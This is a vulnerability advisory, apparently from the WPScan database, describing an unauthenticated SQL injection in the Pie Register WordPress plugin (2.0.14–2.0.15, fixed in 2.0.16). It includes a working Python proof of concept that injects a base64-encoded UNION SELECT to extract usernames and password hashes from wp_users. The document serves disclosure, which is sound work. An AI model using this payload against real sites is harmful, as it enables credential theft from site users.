Pie Register 2.0.14-2.0.15 - SQL Injection

Description

User input is not validated correctly when accepting an Invitation Code, as such an SQL Injection attack is possible. This attack is triggered when the parameters ‘show_dash_widget’ and ‘invitaion_code’ are provided to any page, by any user (anonymous or otherwise).

Proof of Concept

import requests,base64,re

url="http://localhost"
query = "') UNION SELECT (SELECT GROUP_CONCAT(CONCAT_WS(',',user_login,user_pass)) FROM wp_users GROUP BY 1=1),2#"
query_encoded = base64.b64encode(query)
params = {
        "show_dash_widget":1,
        "invitaion_code":query_encoded
}
r = requests.get(url, params=params)

print re.search(r"<tr><td>([^<]*?)<", r.text).group(1)

Affects Plugin

pie-register

fixed in version 2.0.16

References

URL	https://research.g0blin.co.uk/g0blin-00040/

Classification

Type	SQLI
OWASP Top 10	A1: Injection
CWE	CWE-89

Miscellaneous

Submitter	James Hooker
Submitter Website	https://research.g0blin.co.uk
Submitter Twitter	g0blinResearch
Views	1340
Verified	No
WPVDB ID	7958

Timeline

Publicly Published	2015-05-04 (over 3 years ago)
Added	2015-05-04 (over 3 years ago)
Last Updated	2015-07-04 (over 3 years ago)

Copyright & License

Copyright	All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License	Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.